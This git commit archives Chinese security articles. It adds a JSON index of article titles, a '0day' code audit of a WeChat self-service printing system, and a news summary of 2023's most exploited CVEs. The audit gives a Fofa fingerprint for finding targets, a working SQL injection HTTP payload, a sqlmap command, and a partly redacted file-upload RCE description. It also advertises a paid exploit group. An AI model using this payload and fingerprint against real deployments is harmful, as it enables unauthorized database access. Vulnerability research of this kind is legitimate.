.md、AI代码审计和POC编写、Fckeditor编辑器漏洞汇集、建了个SRC专项漏洞知识库、.md、【漏洞预警】 用友BIP 数据库配置信息泄露、【漏洞预警】 易宝OA-GetProductInv SQL注入漏洞、.md、PostgreSQL数据库存在高危漏洞CVE-2024-10979(8.8)、.md、CVE-2024-28888:福昕阅读器中使用释放后导致远程代码执行、.md、(0day)某全新UI自助打印微信小程序系统SQL+RCE漏洞代码审计、攻防演练 | 一次近源渗透、一款java漏洞集合工具、.md、打补丁要快!0Day漏洞正在被黑客广泛利用、Velociraptor:一款终端节点可视化与数据收集工具、Palo Alto Networks 确认存在新的防火墙0day漏洞、Vcenter图形化漏洞利用工具、VulToolsKit一把梭漏洞Exploit合集、漏洞预警 | Apache ZooKeeper身份验证绕过漏洞、漏洞预警 | XStream栈溢出漏洞、漏洞预警 | HPE Aruba Networking Access Points命令注入漏洞、【漏洞复现】用友YonBIP高级版存在任意文件读取漏洞、compiler explorer 轻松从汇编角度理解代码、网太CMS漏洞复现、微软2024年11月份于周二补丁日针对90漏洞发布安全补丁、2023年最易被利用的漏洞、

This commit is contained in:
test 2024-11-16 16:12:59 +00:00
parent bc25b93490
commit 8c198b7a93
24 changed files with 2988 additions and 3 deletions

View File

@ -36,5 +36,34 @@
"https://mp.weixin.qq.com/s?__biz=MzIwNDA2NDk5OQ==&mid=2651388483&idx=1&sn=070fb6976ee52108d263858115ea9bfd&chksm=8d398bcbba4e02ddbe0183f79c2682bbf1cab54e4ba6bb0697fdc56e297e7303aa9eb938b9e6&scene=58&subscene=0": "2024年网络安全漏洞研究人才培养交流活动成功举办",
"https://mp.weixin.qq.com/s/O2Ohp_ceYrTo8hppX09fkw": "(0day)微信公众号商家收银台小程序系统存在前台任意文件上传漏洞",
"https://mp.weixin.qq.com/s/tbEXIAPT-Vumch-WyoGZHQ": "代码审计-某oa任意文件读取(1day)",
"https://mp.weixin.qq.com/s/73CXvF4ejvgS40OetzXr8A": "(0day)全新优客API接口管理系统代码审计"
"https://mp.weixin.qq.com/s/73CXvF4ejvgS40OetzXr8A": "(0day)全新优客API接口管理系统代码审计",
"https://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247502141&idx=1&sn=f7e19ad84c7a39f767da0b54cad21967": ".md",
"https://mp.weixin.qq.com/s?__biz=Mzg4NTg5MDQ0OA==&mid=2247487335&idx=1&sn=c2800f225873a4a1b38711bacba10316": "AI代码审计和POC编写",
"https://mp.weixin.qq.com/s?__biz=MzA3NTc0MTA1Mg==&mid=2664712071&idx=1&sn=98356c1f6829546d47af1e4d43f89ace": "Fckeditor编辑器漏洞汇集",
"https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247517203&idx=2&sn=3074826837ddd653a7d1ae03a600a0b4": "建了个SRC专项漏洞知识库",
"https://mp.weixin.qq.com/s?__biz=Mzk0MzI2NzQ5MA==&mid=2247486636&idx=1&sn=5d9cfbe6b8393b15c60b04ca9c2c9588": ".md",
"https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487499&idx=1&sn=4ad7e59489c09ab80bee906e929b311a": "【漏洞预警】 用友BIP 数据库配置信息泄露",
"https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487499&idx=3&sn=b3cf1540ab72404aab438e963c5e761d": "【漏洞预警】 易宝OA-GetProductInv SQL注入漏洞",
"https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487499&idx=4&sn=69d6613ba3812956a0388203252d7a8f": ".md",
"https://mp.weixin.qq.com/s?__biz=MzkzNDIzNDUxOQ==&mid=2247492449&idx=2&sn=ded00a05c99093340d9c413be00b1a5a": "PostgreSQL数据库存在高危漏洞CVE-2024-109798.8",
"https://mp.weixin.qq.com/s?__biz=MzkxNzUxMjU5OQ==&mid=2247484847&idx=1&sn=ab525f7b54b1842379879fcb44279dfe": ".md",
"https://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247523915&idx=1&sn=0522e35aa0afa2167e0dfd9d5a6954d7": "CVE-2024-28888福昕阅读器中使用释放后导致远程代码执行",
"https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066024&idx=4&sn=46592438737abae8701b9ba1b7160d86": ".md",
"https://mp.weixin.qq.com/s?__biz=Mzg4MTkwMTI5Mw==&mid=2247486133&idx=1&sn=a795a853e80c985de5fceca4309365ce": "(0day)某全新UI自助打印微信小程序系统SQL+RCE漏洞代码审计",
"https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247545126&idx=1&sn=b2f2e3d1dba89c587651768a66070b2d": "攻防演练 | 一次近源渗透",
"https://mp.weixin.qq.com/s?__biz=Mzk0ODM0NDIxNQ==&mid=2247492730&idx=1&sn=4830f7a0e4dfa7e50b8fb0ccc7e0e0b9": "一款java漏洞集合工具",
"https://mp.weixin.qq.com/s?__biz=Mzk0Mzc1MTI2Nw==&mid=2247485338&idx=1&sn=615b6a9ca710339fdd1b48528711a058": ".md",
"https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651307299&idx=1&sn=467809755fdcc647cdde9f67ad9a27a2": "打补丁要快0Day漏洞正在被黑客广泛利用",
"https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651307299&idx=4&sn=faa8ef20c4f618771d92d2e34863625b": "Velociraptor一款终端节点可视化与数据收集工具",
"https://mp.weixin.qq.com/s?__biz=MzI2NzAwOTg4NQ==&mid=2649793147&idx=3&sn=c17de8d66d7e37e8209eab45ef7f5654": "Palo Alto Networks 确认存在新的防火墙0day漏洞",
"https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650603612&idx=4&sn=1ca7d7d27c71f41ef3992ddac7cda038": "Vcenter图形化漏洞利用工具",
"https://mp.weixin.qq.com/s?__biz=MzkyNzIxMjM3Mg==&mid=2247488171&idx=1&sn=dbbce680730d50271fcb4e886e029f36": "VulToolsKit一把梭漏洞Exploit合集",
"https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491421&idx=1&sn=653b49f157760ea962f45f3e9471858c": "漏洞预警 | Apache ZooKeeper身份验证绕过漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491421&idx=2&sn=89f3fc90da6871059bb0ea398e1ffb26": "漏洞预警 | XStream栈溢出漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491421&idx=3&sn=eabce5e15b6befff94c2407acd4a5aa9": "漏洞预警 | HPE Aruba Networking Access Points命令注入漏洞",
"https://mp.weixin.qq.com/s?__biz=MzU3MjU4MjM3MQ==&mid=2247488371&idx=2&sn=3ad1f97fe2651cfd09c4aa8767ee6a6d": "【漏洞复现】用友YonBIP高级版存在任意文件读取漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486789&idx=1&sn=9e271a3346eed986ecc5b7a4aece7f88": "compiler explorer 轻松从汇编角度理解代码",
"https://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486789&idx=2&sn=f8617e893d02f1eaca70fb0f9661a3e3": "网太CMS漏洞复现",
"https://mp.weixin.qq.com/s?__biz=Mzg2NjY2MTI3Mg==&mid=2247497601&idx=1&sn=1b31fff83d5276667f7ead2ae5de2a6b": "微软2024年11月份于周二补丁日针对90漏洞发布安全补丁",
"https://mp.weixin.qq.com/s?__biz=Mzg2NjY2MTI3Mg==&mid=2247497601&idx=2&sn=413b3330c9fde967c520582aefbd4bd6": "2023年最易被利用的漏洞"
}

View File

@ -0,0 +1,260 @@
# (0day)某全新UI自助打印微信小程序系统SQL+RCE漏洞代码审计
原创 Mstir 星悦安全 2024-11-16 04:37
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/lSQtsngIibibSOeF8DNKNAC3a6kgvhmWqvoQdibCCk028HCpd5q1pEeFjIhicyia0IcY7f2G9fpqaUm6ATDQuZZ05yw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
点击上方
蓝字关注我们 并设为
星标
## 0x00 前言
**在数字化时代打印服务的需求与日俱增。为了满足用户的便利需求全新UI的自助打印系统/云打印小程序。**
**全新UI设计采用2024年最新的UI设计风格界面简洁美观用户体验极佳。**
**云打印功能:支持用户通过小程序上传文件并进行云端打印,方便快捷。**
**自助服务:用户可以自主选择打印参数,如打印份数、纸张类型等,实现真正的自助打印。**
**多平台支持:源码支持微信小程序平台,方便用户在移动端进行操作。**
**Fofa指纹:"未登录" && "/admin/login/index.html"**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5duuuJAFpJIFYqG1ffXXkRmpLI5AKHbcMk7tQAXzWfnOhKOg03ACURvxO4qtxdNVjw64VyzpGWU1g/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5duuuJAFpJIFYqG1ffXXkRmLib7MD3jLLyO8DoQ5V8nm7tUW9ibHZ7pVDPfsF9iarOaR3yMpptt4ibIAQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5duuuJAFpJIFYqG1ffXXkRmY5ic29Gia85nW5yUOgz0bLibeV3L4cduZhwbdfZR6DxR6Ot1EmNFjXTDw/640?wx_fmt=png&from=appmsg "")
**框架:ThinkPHP 6.0.2 Debug:True**
## 0x01 前台SQL注入漏洞
**位于 /api/controller/Shop.php 控制器的nearByShop 方法通过传入latitude和longitude 来插入到SQL语句中然后直接通过 Db::query() 进行查询,且未有过滤,导致漏洞产生.**
```
public function nearByShop()
{
$latitude = input('param.latitude', '');
$longitude = input('param.longitude', '');
$sql = <<<EOT
SELECT
a.*,
(
6378.138 * 2 * asin(
sqrt(
pow(
sin(
(
radians( a.lat ) - radians( $latitude)
) / 2
),
2
) + cos( radians( a.lat ) ) * cos( radians( $latitude ) ) * pow(
sin(
(
radians( a.lng ) - radians( $longitude )
) / 2
),
2
)
)
)
) AS distance
FROM
do_shop a
HAVING distance < 300000
ORDER BY
distance
LIMIT 10
EOT;
$data = Db::query($sql);
$printer = [];
if (!empty($data)) {
foreach ($data as $v) {
$shop_ids[] = $v['id'];
}
$where[] = [
'shop_id',
'in',
$shop_ids,
];
$printer = Db::table('do_printer')->where($where)->select();
if (!empty($printer)) {
foreach ($printer as $k => $v) {
$v['business_hours'] = json_decode($v['business_hours'] ?? '[]', true);
//$v['print'] = json_decode($v['print'] ?? '[]', true);
$v['functions'] = json_decode($v['functions'] ?? '[]', true);
foreach ($data as $shop) {
if ($shop['id'] == $v['shop_id']) {
$v['shop_name'] = $shop['name'];
$v['distance'] = intval($shop['distance'] * 1000);
}
}
$printer[$k] = $v;
}
}
}
$return = [
'code' => 0,
'data' => [
'shop' => $data,
'printer' => $printer,
],
];
return json($return);
}
```
**Payload:**
```
POST /api/shop/nearByShop HTTP/1.1
Content-Length: 104
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
latitude=1&longitude=GTID_SUBSET(CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),1,190))),9392)
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5duuuJAFpJIFYqG1ffXXkRmFenCTZdmkuTHmRap2icbhHAOoH2IX2o1anoWjc0u81f6kQCLSyqmzXA/640?wx_fmt=png&from=appmsg "")
**python sqlmap.py -r a.txt --level=3 --dbms=mysql**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5duuuJAFpJIFYqG1ffXXkRmg2pv8vtZg6kicYj53OmOiaddoDlhgibRtExo5HT8luUm3IbTOZxpg4bbg/640?wx_fmt=png&from=appmsg "")
## 0x02 前台任意文件上传漏洞(RCE)
**位于 /xxxx/controller/xxxxx.php 控制器中的file方法通过file()函数获取文件,并通过 putFile() 函数 直接将文件写入到/sxxxxx/ 目录中,然后传入 proxxx=xxxxx 进入该分支即可得到上传文件的地址.**
```
/**
* 处理上传文件.
*
* @return \think\response\Json
*/
public function xxxx()
{
$file = request()->file('file');
$page_type = input('param.page_type', 1, 'intval');
$print_type = input('param.print_type', 1, 'intval');
$filename = input('param.filename', $file->getOriginalName(), 'trim');
$doc_type = input('param.doc_type', 1, 'intval');
$printer_id = input('param.printer_id');
//文件处理流程
/**
* 1.none 不处理
* 2.id_card 身份证:不插入数据库,正反面都上传完成后,用户点击完成时合并图片,保存到打印列表
* 3.c1 1寸照片
* 4.c1x 大1寸照片
* 5.c2
* 6.c2x
* 7.photo.
*/
$process = input('param.process', 'none', 'trim');
try {
$savename = Filesystem::disk('public')->putFile('', $file);
$root = config('filesystem.disks.public.root');
$domain = config('filesystem.disks.public.url');
switch ($process) {
case 'xxx_xxxxx':
$savename = Config::get('filesystem.disks.public.url').'/'.$savename;
$return = [
'code' => 0,
'data' => ['savename' => $savename],
];
} catch (ValidateException $e) {
$return = [
'code' => 1,
'msg' => $e->getMessage(),
];
}
$return['printer_list'] = $this->printerList();
return json($return);
}
```
**Payload:**
```
POST /xxxx/xxxxx/xxxx HTTP/1.1
Host: 127.0.0.1
Content-Length: 298
Cache-Control: max-age=0
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXr8AJ9qGX4nSmcI0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: close
完整EXP请见文末!完整EXP请见文末!完整EXP请见文末!
完整EXP请见文末!完整EXP请见文末!完整EXP请见文末!
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5duuuJAFpJIFYqG1ffXXkRmibBK0pAmbTpErGrhRvG9mvTLEyKE7mWhXHCjmMicmKPibslUYtTr0kvSg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5duuuJAFpJIFYqG1ffXXkRmfKXbmbBSsLzObic4NjzhIYzRveXvwlmnG4vqBXn4aR8QSEic0Z5HoWXw/640?wx_fmt=jpeg "")
## 0x03 纷传圈子介绍
完整审计文章及源码放在纷传圈子里了
**高质量漏洞利用研究代码审计圈子每周至少更新三个0Day/Nday及对应漏洞的批量利用工具团队内部POC源码分享星球不定时更新内外网攻防渗透技巧以及最新学习SRC研究报告等。**
**【圈子权益】**
**1一年至少999+漏洞Poc及对应漏洞批量利用工具**
**2各种漏洞利用工具及后续更新渗透工具、文档资源分享**
**3内部漏洞库情报分享目前已有1700+poc会每日更新包括部分未公开0/1day**
**4加入内部微信群遇到任何技术问题都可以进行快速提问、讨论交流**
**圈子目前价格为40元现在星球有500+位师傅相信并选择加入我们**
****
**网站源码及漏洞库已于11.5日更新**
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5dO3JY3ibuSzzKb6JXHOsho87AiaLnO5SC57BIhrNmuPRmFKjPehD8FRjZTI1SXD6wEnbSJgujbCbbg/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5dPFicRheSpuSsBE8ZFeE6HwYQ7XZx91DUHD6M2jFjo9jwxZEnQs2PaU9jQAvYicVxtcIiaKI2QeRxqA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
****
**圈子内部漏********洞库(日更)**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5dO3JY3ibuSzzKb6JXHOsho8GllKEjcqXnSa6OY73aptxTiaibrLiaKrw85bDlFrRjR8aUGrxZKVQBTug/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
**每篇文章均有完整指纹和详细POC**
****
**一起愉快地刷分**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5ff43kUoicsmnll86ficaMcTp1nDJvFuhT6INWEyGaCkEEclfEo8Ld6OBOzzJ3BkTVbrfqd41XhAhicA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5dPFicRheSpuSsBE8ZFeE6HwwvkuIIecPQwHta0wibQuCqoSTqsc2K1KZDpJb3enDibBiau4EEhxrTYxA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5ff43kUoicsmnll86ficaMcTpt1uZwVAmW8XEscyvU51uc9sdiaHViaJKMEZyiaM4bAaQfGIPNd26u2A5w/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
**上百套审计源码包括各种协同办公OA**
****
**入圈之后可私信我帮你找源码已开通各大源码站VIP**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5ff43kUoicsmnll86ficaMcTpPGVahCuyNFFdRtlOyjb6Z1dj8LMnibicPickAJZQLpTzoBoUqy9Xun3tg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5dbasJicXJDEOR85icHkfIda3gg2HpaWjW2MZN9KZdGzX99Ofl7SRETFA4TicFabIO2UGibSONn6bhXQw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
**标签:代码审计0day渗透测试系统通用0day闲鱼转转**
**PS:关注公众号,持续更新漏洞文章**
**免责声明:****文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!**

View File

@ -0,0 +1,348 @@
# 2023年最易被利用的漏洞
何威风 河南等级保护测评 2024-11-15 16:00
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rTibWNx9ARWlr2gsy0GXlIR3oaTAYLNlTAcfSygiaibN8NtFC0qyeuZxIW8iaQCaVKpuweFc22nw6O676b5UnJPKZA/640?wx_fmt=png&from=appmsg "")
**根据五眼情报联盟政府机构的数据2023年最常被利用的漏洞大多最初都是以零日漏洞的形式被利用的。**
一份汇总数据 的
咨询报告显示
,与上一年相比
2023年利用零日漏洞攻击企业网络的情况显著增加。上一年被利用的顶级漏洞中只有不到一半是以零日漏洞的形式被发现的。
数据显示,威胁行为者在漏洞公开披露后的两年内继续成功利用漏洞。
这些机构表示:“随着越来越多的系统得到修补或替换,这些漏洞的实用性会随着时间的推移而下降。当国际网络安全努力缩短零日漏洞的寿命时,恶意网络行为者发现零日漏洞的实用性会降低
。”
以安全为中心的产品开发生命周期的实施、增加负责任的漏洞披露的激励以及使用复杂的端点检测和响应 (EDR) 工具,应该有助于缩短零日漏洞的寿命。
2023 年最容易被利用的漏洞列表以
CVE-2023-3519
CVE-2023-4966
开头,这两个漏洞是 Citrix NetScaler ADC 和 Gateway NetScaler 实例中的两个严重程度极高的漏洞已于去年7月和10月进行了修补但在前几个月都曾被用作零日漏洞进行利用。
该机构还重点介绍了
CVE-2023-20198和CVE-2023-20273
,这两个思科 IOS XE漏洞已于2023年10月修补此前它们被用作零日漏洞导致以 root权限执行命令。
Fortinet的防火墙也经常成为攻击目标去年有威胁行为者利用
CVE-2023-27997
零日漏洞。攻击者无需身份验证即可远程利用此严重性漏洞在易受攻击的 FortiOS 和 FortiProxy 实例上执行任意代码。
被追踪为
CVE-2023-34362 的
MOVEit Transfer 管理文件传输 (MFT) 软件中的一个严重 SQL 注入漏洞在 Cl0p 黑客
活动
中被利用为零日漏洞,影响了超过 2,770 个组织和近 9600 万个人,该漏洞也是去年最常被利用的漏洞之一。
该机构表示,去年披露的另一个经常在攻击中使用的零日漏洞是
CVE-2023-2868
,这是 Barracuda 电子邮件安全网关 (ESG) 设备中的一个远程命令注入问题,在被发现之前已被利用了数月。
Microsoft Outlook 也经常成为恶意攻击的目标,去年威胁行为者被发现使用
CVE-2023-23397
,这是一个零点击漏洞,在补丁发布之前,一个俄罗斯 APT 已经将其作为零日漏洞利用了整整一年。
该列表还包括
CVE-2023-22515
,这是 Atlassian Confluence 数据中心和 Confluence 服务器中的一个严重的不当授权缺陷,在 2023 年 10 月下旬公开披露后不到一周就开始被利用。
在公开披露后的几天内,威胁行为者还开始利用
PaperCut NG/MF 打印管理软件中的远程代码执行漏洞CVE 
- 
2023-39143
、TeamCity CI/CD 服务器中的身份验证绕过漏洞 CVE-2023-42793 以及
ownCloud
中的信息泄露问题 CVE-2023-49103。
去年经常被利用的旧安全缺陷包括
臭名昭著的 Log4Shell 漏洞
CVE 
-2021-44228
、Zoho ManageEngine 漏洞 CVE-2022-47966 和
关键的 Windows Netlogon 远程协议 (MS-NRPC) 漏洞 (称为 Zerologon) 
CVE-2020-1472 。
政府机构警告称苹果、Atlassian、思科、大华、F5、FatPipe、Fortinet、Fortra、GitLab、Ivanti、瞻博网络、微软、Netwrix、Novi、Progress Telerik、RARLAB、Sophos、Unitronics 和 Zoho 等公司产品中的另外 32 个漏洞已频繁被利用。
建议供应商和开发人员识别经常被利用的漏洞类别并实施缓解措施来消除它们实施安全的设计实践默认使用最安全的设置配置可用于生产的产品并列出每个已发布CVE的根本原因。
**组织应遵循安全最佳实践,包括实施强大的补丁管理流程、执行自动资产发现、定期备份系统、维护更新的网络安全事件响应计划、实施强密码和防网络钓鱼多因素身份验证 (MFA),以及配置最小特权访问控制和零信任网络架构。**
— **欢迎关注 往期回顾**
 —
[精彩回顾祺印说信安2024之前](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103882&idx=1&sn=fe68b43898a872f40e66a8cdb720d7d7&chksm=8bbccef3bccb47e5bd52249ff6490fe17df9696568053776e4124ef70d790a5ed06f2d3c6809&scene=21#wechat_redirect)
[230个网络和数据安全相关法律法规规范文件打包下载](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652105479&idx=2&sn=1f51edc838bc6dbe991b184178d6d0ac&chksm=8bbcc13ebccb4828eb26b14990d39068d4d1e7c3f43989dd0ade728567228036ef8f12f55208&scene=21#wechat_redirect)
[单位高层领导参与网络安全不应该只是口头说说](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109701&idx=1&sn=c71fdd6f2c197fa7fd1bd40b1539be2e&chksm=8bbcd1bcbccb58aad9294bb2e2079582fecf40b6fb2646e12026f017a4453a854cfea1ed7705&scene=21#wechat_redirect)
[党委(党组)网络安全工作责任制实施办法](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109696&idx=1&sn=18d149ee98579471afff5c7eb056d2ef&chksm=8bbcd1b9bccb58af141e591b7a9814f6c1c01413f8fc0472515b03f50356444026f10116793a&scene=21#wechat_redirect)
[“两高一弱”专项下,谈合规下的弱口令](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110057&idx=1&sn=b34aa34b68219a34d6e7f3ed97c1a403&chksm=8bbcd6d0bccb5fc6e0f1fba87f40441349b1e1ae98418eec649d08bcb0dd6c7676f76ba10b05&scene=21#wechat_redirect)
[网络被黑?还看“两高一弱” ,原来是不履行网络安全义务惹的祸](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110738&idx=1&sn=8a1eb107a95fe88afd3ee0acbc33ac18&chksm=8bbcd5abbccb5cbd0ac20564bbc40772e25befab23149eae9bb5ec338d9fe6654e7c32519c63&scene=21#wechat_redirect)
**>>>网络安全等级保护<<<**
[网络安全等级保护:等级保护工作、分级保护工作、密码管理工作三者之间的关系](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652098579&idx=1&sn=56da5aedb263c64196a74c5f148af682&chksm=8bbcfa2abccb733ca8dd898d7c0b06d98244ca76bd7be343482369fa80546554cced706fa74c&scene=21#wechat_redirect)
[网络安全等级保护政策与技术“七一”大合集100+篇](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108174&idx=1&sn=455ba77fd3a186100820b8d180fcd742&chksm=8bbcdfb7bccb56a17cc1d42b93895ecfb0b51a9417a5f63fc4482567c73fb46be0418d43b567&scene=21#wechat_redirect)
[网络安全等级保护:安全管理机构](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109115&idx=2&sn=4f1af46e726949f4d038bde63c2362ef&chksm=8bbcd302bccb5a14b71aa1c242c14636fb3f4d37710e18db76bdcb91ab74a3aaa412f1226c7f&scene=21#wechat_redirect)
[网络安全等级保护:网络安全事件分类分级思维导图](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109100&idx=1&sn=b0a47754b6df3f02f38daf7b7e23eb74&chksm=8bbcd315bccb5a032afa3441f65dfc391355834fbdf574ae6bce3caf42fa90766d80de1d6e84&scene=21#wechat_redirect)
[网络安全等级保护:明确测评双方的责任从了解测评过程指南开始(思维导图下载)](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111773&idx=1&sn=1441cfedec441d13dff9e989012e9dd0&chksm=8bbb29a4bccca0b2b266820ba86269a3baef47022ee3776e2521ad837991d1a6508f3c22bbad&scene=21#wechat_redirect)
**>>>数据安全系列<<<**
[数据安全管理从哪里开始](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103384&idx=1&sn=391073e6109ff105f02be9029e01c697&chksm=8bbcc8e1bccb41f7fe478a3d22757d61f10dcf42548c1c02c0579b8f161277e527ba98ccb542&scene=21#wechat_redirect)
[数据泄露的成本:医疗保健行业](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109243&idx=2&sn=cd2405090c5d26f97c602946d3f8eea1&chksm=8bbcd382bccb5a94114aa6fda3d3ba0629eb958a6b7a9711889d552a029462d64ac97e3a46da&scene=21#wechat_redirect)
[数据安全知识:数据安全策略规划](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652104021&idx=1&sn=7f80bb27ce6ad7c9debe83c172ff9f73&chksm=8bbccf6cbccb467a0971b9de4a8b14851c2666ad6934a88b8324a1ffc4b5cf5109cbc3976697&scene=21#wechat_redirect)
[数据安全知识:组织和人员管理](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109274&idx=1&sn=7be5a754d4667aa47c46b16f1b4d0579&chksm=8bbcd3e3bccb5af52e3d908edb77e57505315689950e24754a3152a80528ab6745788a318ec3&scene=21#wechat_redirect)
[数据安全知识:数据库安全重要性](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652104183&idx=2&sn=f2a98256b0497ce3a99c0ad30223bf40&chksm=8bbccfcebccb46d8aac9f8a5c8d1f46061ca61ad69b3a61d52d3dc614e1e18ae65d982a5574b&scene=21#wechat_redirect)
[数据安全知识:数据整理与数据清理](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652105810&idx=2&sn=97ff4a8d1f2c7f3f6a0252f4df58b20b&chksm=8bbcc66bbccb4f7d058c46bc9c67d34c2042993f2ad32c7732d9816f8dfa4abb7e10f0fd307f&scene=21#wechat_redirect)
[数据安全知识:什么是数据存储?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108099&idx=1&sn=0ccf837988c4dc590d1fd9d634d0c02b&chksm=8bbcdf7abccb566cfa3ab37a304567fbca0833291b7f0cb99d36cdebd9d1f58ae72d03d82cd2&scene=21#wechat_redirect)
[数据安全知识:什么是数据风险评估?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652106123&idx=1&sn=5f1a4c50b11a1155b22e8d5f01f5c6ca&chksm=8bbcc7b2bccb4ea46d1666254d8f027d2e68d4f38a621f4d7cc05d398f342a0eabeecb29be2e&scene=21#wechat_redirect)
[数据安全知识:如何逐步执行数据风险评估](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652106385&idx=1&sn=a71f4b9827f82daff6b5ff61d1f66d2d&chksm=8bbcc4a8bccb4dbe639df71411c12a859b26da7b4fd84b544effc20d98426fd628af59a8c868&scene=21#wechat_redirect)
[数据安全知识:数据风险管理降低企业风险](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652106372&idx=2&sn=9ad51e532256b7fbe3aefdf7ec804777&chksm=8bbcc4bdbccb4dabb0cd03a18862dd076ebd798a0bd2aae82a5916e8f9a04b53e5fcd344feb6&scene=21#wechat_redirect)
